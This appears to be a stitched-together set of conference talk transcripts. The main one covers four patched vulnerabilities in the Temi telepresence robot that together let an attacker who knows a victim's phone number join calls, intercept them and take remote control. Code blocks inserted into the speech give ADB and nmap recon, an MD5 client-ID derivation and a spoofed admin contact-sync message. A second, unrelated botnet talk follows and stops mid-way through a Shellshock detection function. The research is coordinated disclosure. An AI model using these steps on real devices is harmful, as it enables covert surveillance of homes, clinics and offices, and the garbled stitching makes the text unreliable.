Hello, IoT Village, first and foremost. What it be, what it do. I'm Mark, and boy have I got some zero-days for you. Now, the reason I call this talk Assembling Voltron isn't just because I'm hacking a robot and it's a cool name, and incredibly clever too, but also because there are four unique CVEs in this target, and when they work together they create something that's greater than the sum of its parts, just like a mech you might have heard of. The next thing you might be wondering is: who are you, and why should we care what you have to say? Well, to start off, like I said, I'm Mark, which really only has one natural response. You can find me on Twitter at ROPsicle, and I'm currently a security researcher on McAfee's Advanced Threat Research team, which I'll be referring to as ATR from now on because it's kind of a mouthful. My focus has been on finding zero-day vulnerabilities, particularly in embedded systems, so this talk is really on brand for me, so to speak. As for previous experience, I spoke at last year's DEF CON in the ICS Village, so I'm basically a celebrity. As for hobbies, I really only do two things: I hack and I squat. Depending on how nice you guys are to me in the Discord channel afterward, I might add streaming to that list, but for now it's just those two. Okay, so let's move on to the target: Temi, or Timi, or however you want to pronounce it. The fact is it's actually a pretty cutting-edge piece of tech. The marketing describes it as "the world's first truly intelligent mobile personal robot for your home." That's a lot of qualifiers. As you can see here, it's actually a pretty small device, about four feet tall, with kind of an Android brain, like an Android tablet, at the top, with a camera and a microphone and a fully functioning touchscreen.
Now, this device was created by Robotemi Global Ltd. They're sort of a startup; this is their first venture into the consumer space, but they actually spun off of a parent company called Roboteam, which does military robotics out of Israel. Now, this thing isn't cheap. It's going to set you back about two grand, but you do get a lot of hardware for that price point. It has the ability to do remote teleconferencing thanks to its camera and microphone, but more importantly it also has autonomous movement and obstacle detection thanks to the various sensors it features and the 360-degree LiDAR. And finally, as you'd expect, it has Alexa and smart-device integration, being a smart IoT device, and you get all the standard things you'd expect from an Android tablet: Wi-Fi, Bluetooth. It even has a wireless charging pad on the back that doubles as a coaster, at least for us. So although Robotemi likes to advertise their robot as sort of a consumer device, the reality is that it's actually seen a lot of use outside of that space. One of the biggest things we've seen recently is that it's used as a mobile kiosk, so in places like the Mall of America and the Nautilus Hotel, and even in certain corporate environments, you'll see that it serves as an informational kiosk with the advantage of being able to show people around. Instead of just telling people where to find, you know, the Jimmy John's in the mall, for example, it can actually navigate them there.
But perhaps the most important and impactful application of this robot is in healthcare, especially given the recent pandemic. With remote visits and remote teleconferencing becoming more and more the standard for doctors' appointments, this has actually seen a lot of pickup in the healthcare space. Already we're seeing it being used by places like Trillium Health Resources. In fact, it's also been picked up by Israel's Ministry of Defense as the de facto teleconferencing solution for the medical wards throughout Israel, and we also see a lot of adoption in East Asia, with places like China and South Korea ordering hundreds of these units for their nursing homes and medical institutions. To accommodate this increased demand, Robotemi has actually increased production to about a thousand units a month, I believe, just to meet the growing demand in the medical space. So now that we know what Temi is, what it's capable of, and where it's being used, it's important for us to draw a box around what normal operation looks like, so that we can then have a lot of fun breaking that box. To start off, normal operation of the Temi is done through the use of its smartphone app, on both Android and iOS. You can call the Temi from it, remotely control it that way, that sort of thing. The registration process for the app is basically just to put in your phone number; it verifies it, and that's how it identifies you, so if you reinstall the app and use the same phone number it'll still pull up your account details.
Now, upon first booting up the robot, which was already a super fun experience, unboxing this thing, we are prompted to scan a QR code, and this basically turns whoever scans that QR code into the de facto admin of that Temi robot. There's only one admin per Temi, and they have the highest privileges for that robot. That doesn't mean other people can't call your robot or even use it. Phone contacts that use the Temi app, meaning contacts in your smartphone that have the Temi app installed, are synced automatically, and this can happen one of two ways. If the admin has phone contacts that have the Temi app, they'll be synced automatically to the robot, and the robot will be aware of them. Alternatively, if you're just a regular user of the phone app, you don't own a Temi but you have a friend that does, for example, and they're in your phone contacts list, you'll be able to call your friend's Temi robot from the app. We can show you how that works. Once you boot up the app, if it finds a contact that owns a Temi, they'll show up down here on the left under your contacts list. Here we have a lab phone as one of the contacts that owns a Temi, and by selecting this contact you can see the Temi robot associated with it; it even has a button that lets you call it straight from that screen. Once a call is actually initiated, this is the interface you're presented with. You can drive the robot around, control your audio options, pretty standard stuff. Now, calling is very much the primo functionality of this robot, and callers really get a lot of control over the device during the call. They get audio and video feeds from the Temi, but they also have control of its movement, which they can drive manually using the little d-pad you saw, and they have access to all of its saved locations. So this immediately became a very interesting potential attack vector to us.
Now, the Temi does ring when someone besides its admin calls it, so in that sense, if you just added someone's phone number and they don't know you, it turns into basically cold-calling a cell phone. There is one exception to this: admins can actually grant certain users in their contacts list special privileges to bypass this limitation. So if you have, say, a family that all use the same robot and can't be bothered with having to pick up on the other end each time, an admin can grant several other users the ability to call in without having it ring. This is also done through the phone app; you can just invite new members and then select whatever contacts you want to be able to call the robot whenever they want. So now that we have a good grasp of what normal operation of this device looks like, we can get into the spirit of trying to hack this thing. Although this target is pretty novel and cutting-edge in a lot of ways, the approach we took to reconnaissance was fairly standard and typical. We started with trying to get a local shell on the device. This was actually super easy, short-circuited by the fact that the device ships with developer options enabled, which include ADB, the Android Debug Bridge, which lets you remotely connect to it like you would an SSH session. That already made our lives a lot easier for moving files around and accessing the device at startup. The next thing we did was capture traffic from the device using Wireshark, and during things like boot-up and phone calls we saw three IPs being hit pretty frequently. One of these mapped to a Yahoo URL, so it's probably being used for the news app, and two more mapped to Amazon AWS instances, which, while not surprising, doesn't really reveal much either.
Next, we ran an Nmap port scan on the device to see what ports it was listening on, another standard thing you do when looking for attack vectors. The only port it identified as open was 4443, which Nmap classified as being used for the service "pharos," which is actually related to printing. This is probably a misclassification; it's more likely this port is being used as an alternative to the standard 443 used for HTTPS. To verify that, we used the ADB shell we had on the device to run netstat, and found that the service associated with this port is something called com.roboteam.teamy.usa, which looks a lot more like an Android application than a standard Linux binary. Sure enough, that was the case: by parsing the list of installed packages on the device, we found the APK associated with this Android application, and using our ADB shell it was trivial to pull this APK off and start examining the software. Now that we had access to the robot's software, and at this stage we also had access to the phone app software, because we could just download that APK from the Play Store (it's completely free, and you don't even need to own a Temi to run it), we could start looking at both of those at the same time. The rest of this is really going to be like 80% reversing and static analysis; that's just the nature of this project. Why, you might ask? Well, a great man once said: the road to exploitation is paved with months of staring at decompiled Java code. That man's name? Albert Einstein. So who am I to argue with that? Once we got to decompiling the code, we decided to use a program called JADX, and JADX was a favorite of ours because it lets you right-click on any symbol and find its usages, which became really important later on. From there we had to pick a vector.
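A sketch of that recon workflow as shell commands. The robot's IP, the ADB port, and the APK install path are assumptions for illustration; the package name is the one reported by netstat as described above, and the exact path should be taken from `pm path` rather than guessed.

```shell
# Connect to the Temi over the network with ADB and get a local shell
adb connect 192.168.1.50:5555
adb shell

# From the attacking machine: scan every TCP port on the robot
nmap -p- 192.168.1.50

# On the device: map the open port to the process that owns it
adb shell netstat -tlnp

# Find the suspect package, ask Android where its APK lives, pull it off
adb shell pm list packages | grep -i roboteam
adb shell pm path com.roboteam.teamy.usa
adb pull /data/app/com.roboteam.teamy.usa-1/base.apk temi.apk

# Decompile the APK to Java sources for static analysis
jadx -d temi_src temi.apk
```

The last step produces the decompiled tree that the rest of the analysis, tracing entry points with JADX's find-usage feature, is performed against.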
Now, I don't know how many of you have actually looked at reversing a full Android app, but they frequently have massive code bases, and Temi was no exception. Instead of groping in the dark, we decided we needed to hone in on a specific subset of the code to refine our search. In our case, we were already interested in the calling functionality of the robot, since that would grant us the greatest level of control, entirely remotely. So we began digging through the different libraries that are part of the APK. After googling around a bit, the one that jumped out at us was something called libagora, a binary related to the Agora Video SDK, a third-party library used specifically for video-calling functionality. Okay, that's perfect, that's exactly what we're interested in. From there we needed to find an entry point related to the attack vector, and you can imagine this as being like a loose strand on a wool sweater, the thing you start pulling on to unravel the whole thing. We began by pulling this library up in IDA and looking at its exports, and immediately the function nativeJoinChannel jumped out at us; it looked like something related to joining a chat room, for example. Opening up the decompiled APK, we saw the same function with the same signature appear there too, which was a good sign. From there we could use JADX's find-usage feature, like, about 600 times, to begin tracing the code path taken for starting video calls. At this stage there really is no more advice or cool shortcuts; you really do just have to draw the rest of the owl. You have to put in the legwork to trace the different function calls being made in order to get a better understanding of how the code works. But the fruit of our labor in this case was actually pretty impressive. It's sort of like staring at the sun, so I'll only show it briefly.
Did you catch that? All right, let's take a closer look at it. Highlighted in the different colors near the top are the different entry points for the calling code. There are four ways to initiate a call from the phone app, and they correlate to these four: you can call a phone contact, you can call a robot contact, you can call either kind of contact from the recent-calls list, and if you happen to be a Temi admin you can also call your own robot. Moreover, we decided to segregate these based on the code flow, either for outgoing calls, indicated in red, or incoming calls, indicated in blue. I'm not going to go through this too deeply, because it's sort of massive, but it did serve as a good reference point for all the reversing we had to do later. Okay, so we have four vulnerabilities to get through, so let's jump right into it. The very first one, both chronologically and in terms of complexity, is the CVE ending in 70. You can see here that it's categorized as a use of hard-coded credentials, and it's present in the Temi Android app. To better understand what this vulnerability entails, let's go through the process we used to discover it. This really consisted of four easy steps: R-T-F-M. And I do mean that pretty literally: just by looking through the Agora documentation for their video-calling API, we were able to get 80% of the way to finding this vulnerability. Specifically, we decided to take a second look at that joinChannel function we saw earlier. According to the Agora documentation, it has two required parameters and two optional ones, and this is really all that's needed to join an existing video call. The first is something called a token, and it seems that if the developer uses a static App ID, the token is optional and can be set to null. This was interesting to us. The second required parameter for joining a channel is a channel name; this is something we'll touch on a bit later.
For now, we were interested in the static App ID and whether the Temi was using a token at all. Taking a look at the same function in the code, we found that it is indeed setting that token parameter to null, which means it's likely using a static App ID as indicated in the documentation. Okay, so then we started looking for this static App ID. Where could it be found? Referring back to the Agora documentation, we found the one API call that actually takes it as a parameter, the RtcEngine.create function, and the docs describe it as an App ID issued by Agora to developers, which is sort of vague. But after some more digging we discovered that it's used as a sort of namespace that segregates different users, or different implementations, on the Agora remote servers. What that means is there is one static App ID shared amongst all Temi robots and Temi phone-app users, and the App ID ensures that users of that service can only call other Temi users; they can't call an arbitrary Agora client. So this is actually a pretty important credential to have access to. Since we knew the function that takes it as an argument, we looked for that function in Temi's decompiled code, and sure enough, there was the App ID, hard-coded directly into an app that's freely accessible on the Play Store and fairly trivial to decompile. This was already a good start, but to really exploit this as a vulnerability we needed not only the App ID but also the channel name, so we could actually join an existing call. So if we still needed the channel name, how could we get it?
Well, by going through that nice little graph I showed earlier, we were able to trace down the function that actually generates the channel name. Here it's being called a session ID, but they're really the same thing, and as you can see, it's doing nothing too complicated: it's just generating a random six-digit value. This is important, because while 900,000 possibilities may seem like a lot, it's well within the range of brute-forceable attack vectors. So in theory, an attacker could take the hard-coded App ID extracted from the downloadable app, which is shared amongst all Temi installs, and then use brute force to try every possible channel name, and by doing so they could potentially intercept any ongoing Temi call on any Temi install. Now, obviously we couldn't test such a brute-force attack against a live production server, but what we could do is create a custom Agora app to join a Temi call we launched locally. We did this by logging the channel name using ADB, and sure enough, using this custom app we were able to join the existing call and essentially spy on the other two call members, thereby proving this is a legitimate attack vector. The next vulnerability I'm going to discuss is sort of a helper vulnerability. It's classified as an origin validation error, and it's also present in the Temi Android app. The reason we call it a helper vulnerability is that it's related to the fact that you can modify the Temi app and it still has full access to all the remote services it uses.
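To illustrate the keyspace involved, here is a rough shell sketch, not Temi's actual code, of generating a random six-digit session ID the way the decompiled generator was described, along with the size of the space an attacker would have to sweep.

```shell
# Random six-digit channel/session name, like the decompiled generator
shuf -i 100000-999999 -n 1

# Size of the keyspace an attacker would need to brute-force
echo $((999999 - 100000 + 1))   # 900000 possibilities
```

At 900,000 candidates, even a modest guessing rate exhausts the space quickly, which is why a short numeric channel name offers essentially no protection once the App ID is known.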
It doesn't perform any kind of tamper checking to make sure that it's not running on a rooted device or that the code for the app hasn't been modified in any way; it just isn't aware of that. The reason we were motivated to pursue this as an attack vector is that it's much easier to modify existing code than to start from scratch, but more importantly, the Temi Android app already has access to all those remote services, which requires some degree of authentication. Instead of trying to extract the keys it's using and whatever other authentication mechanisms from the app and make our own, we just leverage the existing app and inject our malicious code into it. The way we accomplish this is by first unpacking the APK, which we can do using apktool. Next, we search for the particular piece of code that we want to modify. This could be either in the decompiled code or in the various resource files included with the APK. As a proof of concept, we decided to try to change the text for the call button, which we found through some grepping. Okay, so now that we knew which part of the APK we wanted to change, the next thing was to simply make that modification, and that was as simple as pulling it up in a text editor and replacing the string with what we wanted. In this case we decided to rename it "PWN", give it a little more spice. Last but not least, we had to repack but also re-sign the app. The reason we need to re-sign is that Android does not allow unsigned apps to be installed on the device, and by modifying the existing app's contents we invalidated the existing signature. But no worries: since the signature itself is not being checked by the device, there's no reason we can't just create our own signature and use that.
So the repacking process is once again done using apktool, and then we create a signature using a combination of keytool and jarsigner, as shown here. The end result was that we were able to successfully change the string on the call button, but perhaps more importantly, modifying the app in this way proved not to impact its functionality in the least, meaning that we could potentially make non-trivial changes and still be able to perform things like calling. Now, exploitation of this vulnerability is a little tricky to discuss without spoiling the rest of the presentation, because its main application is to help exploit the next two vulnerabilities, so we'll save that discussion for them. No spoilers. Okay, vulnerability numero tres. This one is actually missing authentication for a critical function, a little more serious than the last two, and it is present in Temi's MQTT broker. If you don't know what MQTT is, I'm going to give you a real quick crash course on it, just so we're all on the same page. MQTT is a publish-subscribe messaging protocol that's specifically designed for IoT and other lightweight devices, so it's not too surprising to see Temi using it. The way it works is that clients publish messages to certain topics, and subscribers to those topics then receive the messages. You can think of it as sort of like subscribing to a YouTube channel and then receiving notifications whenever your favorite YouTuber uploads, for example. The topics themselves are strings that are organized into a hierarchy, and the hierarchy is delineated much in the same way that a UNIX file system is: with forward slashes.
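That slash-delimited hierarchy also supports wildcard subscriptions in standard MQTT ('+' matches one level, '#' matches the remainder). A tiny matcher makes the semantics concrete; the "client/<id>/invite" topic shape in the examples is the one this talk discusses, while the matcher itself is just my own simplified sketch of standard MQTT matching, not Temi-specific code.

```python
def topic_matches(pattern: str, topic: str) -> bool:
    """Minimal MQTT-style topic matcher: '+' matches one level, '#' the rest."""
    p_levels, t_levels = pattern.split("/"), topic.split("/")
    for i, p in enumerate(p_levels):
        if p == "#":
            return True          # '#' swallows all remaining levels
        if i >= len(t_levels):
            return False
        if p != "+" and p != t_levels[i]:
            return False
    return len(p_levels) == len(t_levels)

# Topics are slash-delimited hierarchies, much like a UNIX path:
assert topic_matches("client/+/invite", "client/abc123/invite")
assert topic_matches("client/#", "client/abc123/invite")
assert not topic_matches("client/+/invite", "client/abc123/status")
```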
Now, in terms of the Temi, it uses MQTT for basically all communication between itself, the phone app, and the various cloud services, so you see it being used for things like video call invitations, syncing contacts from the admin, and, most importantly, privilege management, which is something we'll delve into in the next vulnerability. So let's get into the discovery and exploitation of this vulnerability: how is MQTT being used, and what authentication is not being implemented? Well, we started by looking at the code used by the app to subscribe to a call invite topic; after all, we're interested first and foremost in the calling functionality. This is just a topic that either a phone app or a robot will listen on to receive phone calls, and the person creating a call for that user will publish a message to that same topic. In our case, you can see it being invoked here on line 408; that's the actual function used to subscribe to that topic, and the topic string itself takes the form "client", then something, followed by "invite", where that something in the middle is an MQTT client ID. An MQTT client ID is just a unique identifier for a specific client connected to the same MQTT broker; it's a way to identify different users. So this actually gave us an idea: could we subscribe to someone else's call invite topic if we're able to modify the app? In order to do that we would need to know their client ID, so we would need to somehow get this information. But how are these client IDs even assigned? Looking back at how recent calls are initiated actually gave us a clue. If you try to initiate a call from the recent calls list, this is the code that gets executed. It invokes a function called telepresence service initiate call, and the first parameter is actually an identifier for the contact you're trying to initiate a call with.
In this case it gets that ID by invoking a function called get MD5 phone number. At this point we were thinking: is it possible that the client ID is just an MD5 hash of the phone number the user used to register? We decided to verify this theory. We did this simply by taking the Google Voice number we used for our Temi admin, computing the MD5 hash, and then searching for that exact hash in all the various Temi files we had, and sure enough, we got a hit in one of the logs we recorded during a call, and it classifies it right there as a client ID. Seems pretty straightforward to me. At this stage we decided to modify the app, taking advantage of the previous vulnerability we outlined, and using this technique we were able to successfully subscribe to another user's call invite topic instead of our own, which basically meant that every single time they received a call, we would get that same call. The only thing we needed to make this happen was the victim's phone number, which, as telemarketers will constantly remind us, is not a high bar. Okay, so getting to the last and easily the most impactful vulnerability: this one is an authentication bypass using an alternate path or channel, and it is present in Temi's REST API, which is something we'll cover as well. In order to understand the authentication bypass, we first need to understand the authentication, and this is related to Temi's privilege management system, which is something we've already sort of touched on with the admin-versus-regular-user distinction. We already know about admins; that's just the person that first registers with the QR code. But there are also two other privilege levels. One is contacts, which is just the default permission level given to a user; it's also the lowest level. There are two ways to become a contact: the first is simply by cold-calling the Temi, and the other is through the Temi admin syncing contacts to the robot.
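The MD5-of-phone-number client ID scheme verified above takes only a few lines to reproduce. This is a sketch of the derivation as described in the talk; the exact phone-number normalization (country code, separators) is an assumption, and the number shown is hypothetical.

```python
import hashlib

def phone_to_client_id(phone_number: str) -> str:
    # Client ID as described: just the MD5 hex digest of the phone number
    # used at registration. The normalization here is an assumption.
    return hashlib.md5(phone_number.encode("utf-8")).hexdigest()

client_id = phone_to_client_id("+15555550123")  # hypothetical number
print(client_id)
# Knowing only a victim's phone number, an attacker can compute their
# client ID offline and derive topics like the call invite topic.
```

Because the mapping is deterministic and the input space (phone numbers) is public, this is effectively an unauthenticated user-ID oracle.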
We'll be focusing on this latter use case. The Temi robot listens on the topic "sync contacts", followed by its MQTT client ID (or its robot ID, the same thing), for requests from the admin to sync contacts, as we can see here. The requests themselves have the following structure: it's an object of type sync contacts message, and all this contains is a list of contacts and the client ID of the person sending the request. The contact list is just tuples of MQTT client IDs and display names, pretty straightforward. The reason the sender client ID is included is that the Temi locally ensures that the sender is equivalent to the ID of its admin, just as a sanity check. Okay, so that's contacts. The third possible privilege level is something called an owner, and owners are related to that functionality I showed earlier where you can add certain users as admins and let them call into the Temi remotely without having it ring. Now, this is actually a little bit different from adding contacts, because while adding a contact is pretty straightforward, adding owners is a little more complex: the request sent by the admin from the phone app is quite a bit different from what the Temi expects on the receiving end. The admin sends its request to a REST API at the following URL, as we can see here, and the requests themselves have the following structure: they contain an inner request and also a signature that's generated using the client's private key; it's a way to verify what the origin is. The inner request consists of the list of users that we want to promote to owners, the ID of the robot we're sending the request for, the source of the request, a timestamp, and finally a type, which is simply adding an owner or removing one.
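The sync-contacts request described above can be sketched as a small structure. The field names here are guesses based on the description, not the actual class; the important property, visible even in this toy form, is that the "sanity check" compares against a sender ID that the sender itself supplies.

```python
from dataclasses import dataclass, field

@dataclass
class SyncContactsMessage:
    sender_client_id: str  # compared against the admin's ID on the robot
    contacts: list[tuple[str, str]] = field(default_factory=list)  # (client ID, display name)

ADMIN_ID = "0f343b0931126a20f133d67c2b018a3b"  # hypothetical admin MD5 client ID

def robot_accepts(msg: SyncContactsMessage, admin_id: str = ADMIN_ID) -> bool:
    # The only check described in the talk: the stated sender must be the admin.
    return msg.sender_client_id == admin_id

# Because that field is attacker-controlled, a spoofed message passes:
spoofed = SyncContactsMessage(
    sender_client_id=ADMIN_ID,
    contacts=[("attacker-client-id", "Definitely A Real Contact")],
)
assert robot_accepts(spoofed)
```

Checking a self-reported identity field is not authentication; without a signature or transport-level identity binding, any publisher who can reach the topic can claim to be the admin.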
Now, how is this different from what the Temi expects to receive on the other end? Well, it's quite a bit different. First of all, the Temi is listening on an entirely different channel: while the admin is sending its request to a REST API, the Temi robot is listening on an MQTT topic, this one specifically. The structure of the request has also changed; it seems to be a subset of the request the admin is sending, where it still has the list of owner IDs and the type, but has been stripped of its signature, its timestamp, and its source. At this point we speculated that the reason for this is that the REST API itself is being used as an authentication mechanism for adding owners; this is a sensitive, privilege-escalation type of deal. So what the REST API does is verify the request by checking the signature, and then it strips out all that verified information before sending it off to the Temi's MQTT topic, essentially serving as a middleman. That means our flowchart looks like this, and presumably, if the verification server deems the signature invalid, nothing happens. Okay, so these privilege levels mostly have utility in how calling works. When a Temi receives a call from a user, if that caller is either an admin or an owner, the Temi will pick up the call automatically; on the other hand, if the caller is a contact, it'll ring. Unfortunately, as an attacker, if we just tried to cold-call the Temi we would become a contact and the Temi would ring. What do we want? Well, we want to be able to call the Temi and have it pick up automatically, because calling is sort of the endgame: you get full control of the Temi's movement and also its audio and video feeds. So what do we already know, and what do we already have, that can help us get there? Well, we know that the Temi uses MQTT for calling and privilege management, and we know that we can subscribe to arbitrary topics, like we
showed when we subscribed to someone else's call invite topic. So our next question was: can we also publish to arbitrary topics? Because if we could, we might be able to escalate our privileges by publishing the add-owners message that the Temi expects to get from the authentication server directly, publishing it right to the MQTT topic it's listening on, thereby bypassing that authentication middleman entirely. This all sounds well and good, but there was a slight caveat: the Temi will only process privilege-escalation requests for existing contacts. Why is this a problem? Well, there are only two ways to become a contact. One is to cold-call the Temi, which is far from ideal because it might arouse suspicion, for various reasons, if some stranger is calling your robot; the other is to have an admin send the sync contacts message with you on it. Those are really the only two ways. Well, the solution actually lies in that latter method: we can spoof the admin's sync contacts message by simply setting the sender client ID to the admin's client ID, since the Temi just implicitly trusts that this value is accurate. In this way, we can send a sync contacts message first, followed by an add-owners message, and then finally initiate the call to the robot. This is sort of what that same functionality looks like after we've modified the app in the following ways. We can see already that it's a lot simpler: in order to become a contact, we just send a malformed request; in order to escalate to becoming an owner, we just send another malformed MQTT request; and then finally, unlike before, now that we have owner privileges, the Temi will pick up the call automatically. Now, just as a quick recap of what these vulnerabilities can do together: it's sort of a recipe for disaster, and the recipe includes the following steps. First, you find a vulnerability in the Temi, and then you just find three more, and here's a completely
unrelated graphic of a bucket with holes; I just like buckets. Now, the ingredients for this recipe involve just the user's phone number and honestly not much else, and what it produces is the ability to spy on calls, the ability to intercept calls intended for other users, and most importantly, the ability to remotely control the robot and see through its eyes and hear through its ears. I've been teasing you guys enough, so at this point I think it's a good time to show you a demo of how this all works. I'm showing it here so you guys can keep up with the video; hopefully the demo is clean. Okay, so on the left we have the Temi admin, on the right we have the attacker's phone, and you can see that I've already added the admin as a phone contact, thereby syncing it to the Temi's contact list. The first thing I'm going to do is install the Temi app normally, unmodified, straight from the Play Store, just to show that there's no smoke and mirrors involved. We'll later be using the modified app with the exact same credentials, going through the same registration process, to show you that it really is the vulnerabilities that give us the greater privileges. Once we're done registering, we're just going to attempt a cold call to the Temi, and you can see the Temi's screen in the bottom center there. Now, as expected, the Temi rings and does not pick up automatically; this is because we only have contact privileges at this stage, and the admin hasn't granted us any special rights. Okay, now that we know what normal operation looks like, let's go ahead and install our custom modified app which leverages these vulnerabilities. Right off the bat you'll see this actually looks very similar to the original app; we only modified what we needed to. It's not until we initiate a call that we'll see how different it is. As I stated previously, we'll be using the exact same credentials to register, and in theory we should have the same privileges. All right, now that the registration is done, we'll try to
initiate the call again, except this time it says PWN instead of CALL, so you know it's our modified app at work. This time the Temi picks up the call automatically, and the attacker now has full access to the Temi's movement, its camera, and its microphone. Now, the first thing an attacker might do is mute the microphone, their own microphone I mean, and turn off their camera, thereby essentially remaining anonymous as they do this. They can start driving around whatever location it's in, start looking around at whiteboards and other sensitive information, and also, you know, modify its volume to annoy people. But more importantly, you can actually navigate to its various saved locations; here we're going to navigate it back to its home base, just so it doesn't run out of battery. So that attack vector leveraged that last vulnerability described, which gives us owner privileges. Let's look at how we can exploit the previous vulnerability, which had to do with intercepting calls. First we'll begin by starting a call from the Temi to its admin, and, as normal, all is well with the world: the admin gets the call but the attacker doesn't. This is expected behavior, but from the hacked app, with a simple button press, we can change this entirely by subscribing to the admin's call invite topic. Now when the Temi calls again, both the attacker and the admin will receive the call, and the attacker is free to pick up this call and gain the same control over the robot as with the other attack vector. All right, that concludes the demo; I've got a couple slides to finish off, so let's talk about the vendor's response to our research. We disclosed all four vulnerabilities to Robotemi Global Ltd on March 5th. They responded very quickly, and they were very receptive to all the mitigations for these vulnerabilities that we suggested in our report. But perhaps most importantly, they maintained constant communication throughout the process of working with us to mitigate the vulnerabilities. Speaking of
which, all four CVEs are actually patched as of July 15th, and McAfee ATR, my team, has reviewed the patches and confirmed that they successfully mitigate all four CVEs. As a result, all code shown is from the older, vulnerable versions of the APKs; in fact, the code is now heavily obfuscated and much harder to parse. This is sort of the gold standard we seek out in security-researcher-and-vendor relationships: it's mutually beneficial, the vendor responds quickly, and we're able to get these things patched as soon as possible, ultimately resulting in a safer product for everyone. Now, before I let you guys go, I do want to discuss really briefly the various impact scenarios you might see for these vulnerabilities. I think the biggest one is healthcare. There are obvious privacy concerns when you can spy on a medical appointment or anything to do with health information; that's why we see it as such a big deal. Another potential attack vector might be using it as a sort of espionage tool for getting the status or location of persons of interest within a hospital, which might be something a nation-state actor would be interested in. Another attack scenario I want you guys to think about is the enterprise one. We've already seen that these robots are being used in corporate offices, and this would grant an attacker access to certain information that simply isn't accessible from a network-based attack scenario: things like information posted on bulletin boards, on post-its on computers (I hope it wouldn't be a password, but who knows), network diagrams, whiteboards, and other sensitive information. And perhaps more obviously, the ability to spy on boardroom meetings: what kind of sensitive information or trade secrets could be listened in on? It is not too surprising to see a teleconference robot being used in a room for teleconferencing. And with that said, that concludes my
talk. I will be present in the Discord server to answer any questions you guys have. Thanks for tuning in!
Once limited to the realm of science fiction, robotics now plays a vital role in many industries, including manufacturing, agriculture, and even medicine. Despite this, the kind of robot that interfaces with people directly - outside of the occasional toy or vacuum - threatens to remain an inhabitant of fiction for the foreseeable future. Teleconference robots, a rapidly growing niche, may help make that fiction a reality. Robots such as these have found use in consumer, enterprise, retail, and even medical environments and some are even capable of autonomous movement. It’s precisely these features, however, that make them a valuable target for hackers. Unlike a simple camera exploit, compromising such a device would grant an attacker mobility in addition to audio/video, greatly increasing their ability to spy on victims in the most private of situations - their homes, medical appointments, or workplaces. Not knowing when to quit, McAfee Advanced Threat Research uncovered four 0-day vulnerabilities in a popular teleconference robot. We’ll show how an attacker armed with nothing besides the victim’s phone number could exploit these vulnerabilities to intercept or join an existing call, gain access to the robot’s camera and microphone, and even achieve “owner” privileges, granting the ability to remotely control the robot - all with zero authentication. Bio: Mark Bereza is a security researcher and new addition to McAfee's Advanced Threat Research team. A recent alumnus of Oregon State's Computer Science systems program, Mark's work has focused primarily on vulnerability discovery and exploit development for embedded systems. Mark previously presented at DEFCON 27, less than 6 months after graduating college.
10.5446/50731 (DOI)
I got booters connected to my botnets. Got hella booters, hella booters, booters, hella booters, booters, I got booters connected to my botnets. Hanging out on hack forums, best believe I got warrants, telling all who listen 'bout my botnets, not boring. Modified Mirai and I'm mixing in the miner, comes as no surprise, getting wrecked by a miner. Cover up his drop bear, looking for me everywhere, know I'm really not there. Places I will not share, drop a couple backups, I know you won't find me. Buy a couple more smart bulbs, won't you kindly? Screamin' Captain Phillips, who the hell are you? Wonder why your toaster's connected to, are you? Why your toasters toastin', I'm using it for roastin', some kid got busy boastin'. Now his modem's smokin', keep the crypto flowin', I need my money now. But I gotta go, cause my mom's studying now, I'm callin' all the shots and it's time for me to score. I got a couple spots, hit me up on Discord. Botnet, I got hella booters, botnet, take over your routers, botnet, in your internet of things, botnet, man the shit hella stinks, botnet, I got hella booters, botnet, take over your routers, botnet, in your internet of things, botnet, man the shit hella stinks, botnet, I got hella booters, botnet, take over your routers, botnet, in your internet of things, botnet, man the shit hella stinks. Well, that was amazing. Thanks so much, Dave, for that amazing intro; I was not really sure what to think when I just got a PM saying there was a theme song for my talk. So hi everybody, thanks for coming and hanging out. Hold on, making sure everybody can hear me, right? In the chat, can you hear me? Say hi if you can, just making sure; I've got a terrible microphone. All right, cool. Okay, so let's get it going. So, who am I? I'm Ned Spooky, Senior Reverse Engineer at Redacted Company.
I primarily work on embedded devices, firmware, industrial control systems, and taking apart proprietary network protocols. You know me online as either Ned Spooky or you. And I contribute OSS tooling and other errata for threat intel, RE, and offensive security. All right, a little background on this: why do this talk? I know there are a lot of people that have seen IoT botnets, whether you've been affected by one or seen people talking about them online, and I had done a bit of my own research and really wanted to add a bit of perspective from my end, because IoT botnets are definitely still incredibly prevalent. We are all affected by them whether we like it or not; you know, if your work Slack is suddenly down because of somebody's fight on Xbox Live or Minecraft, this is affecting you in some way. But I don't think a lot of people take them seriously; a lot of people think it's, like, script-kiddie stuff, which is unfortunate, because it definitely is an issue we all have to deal with. So, I spent a good amount of time collecting malware sources. I started doing this in about 2018, and I have been collecting and developing tools to analyze source code and binaries, which I'll get into later. I studied a lot of the commonly exploited vulnerabilities and wanted to know more about why they were so prevalent: like, why can you have four million hacked routers on your botnet? It's insane to me. So I wanted to inform others about the impact of their technology choices, specifically firmware devs and end consumers, and I also wanted to propose some ideas for how to address these. I should have given this talk about a year ago; it just kind of got pushed to the back burner a bit, but I tried to update it as much as I could.
And I also had to cut out some parts, which I'll mention as I go through the talk. So here's the outline real quick: we're going to go over IoT botnet history, then the actual botnet scene a little bit, talk about the architecture of botnets and how they spread and propagate, and then the firmware vulnerabilities that enable them and steps forward for vendors. So, starting off with IoT botnet history: what is an IoT botnet? If you're here watching for IoT Village, you're probably aware of IoT issues and botnets in general, but for those who haven't seen anything about them, they're basically networks of hacked internet-connected devices: routers, set-top boxes, webcams, your toaster. This little toaster up here has a little script for scraping Shodan for Linksys routers. They're used primarily for DDoS, and they're sometimes used for crypto mining and also for tunneling and proxying traffic. This talk is more cultural than it is technical, and I want to go through a lot of the confusing nomenclature that surrounds this, because there's a ton of it: people call botnets by a million different names, whether you're talking to a researcher or a person who develops them, and there are a ton of different types. So let's go through a little bit of the history here. IoT botnets as they're known right now can be traced back to 2014-ish, when Lizard Squad came out with, I guess, the botnet malware with the most names of any malware. It's been termed BASHLITE; it can also be called Lulzbot, Torlus, Lizkebab, LizardStresser, Ballpit, Gafgyt, and just a bajillion other names. It was spread by exploiting Shellshock vulnerabilities, when Shellshock came out, in BusyBox on a bunch of different devices.
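Those Shellshock scanners all sent a payload with a telltale signature: a bash function definition smuggled into an environment-variable or HTTP-header value. Here is a hedged detection sketch; the regex is my own simplification of the well-known CVE-2014-6271 pattern, not a rule taken from any particular IDS.

```python
import re

# Simplified signature for Shellshock-style payloads: a value that begins
# with a bash function definition "() {", after which injected commands ride.
SHELLSHOCK_RE = re.compile(r"^\s*\(\s*\)\s*\{")

def looks_like_shellshock(header_value: str) -> bool:
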